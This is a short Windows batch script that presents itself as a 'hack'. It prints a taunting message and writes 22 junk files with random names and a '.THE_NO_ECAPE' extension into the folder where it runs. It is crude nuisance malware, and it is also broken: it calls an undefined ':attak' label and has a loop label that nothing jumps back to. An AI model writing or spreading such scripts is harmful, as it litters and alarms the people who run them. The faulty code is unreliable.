@echo OFF
:0
call :attak "THE NO ECAPE HAK YOU THE HELL BRO"
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo  MIKAHYVYTFYTFYGVYGVY>%random%.THE_NO_ECAPE
echo nofing
pause>nul

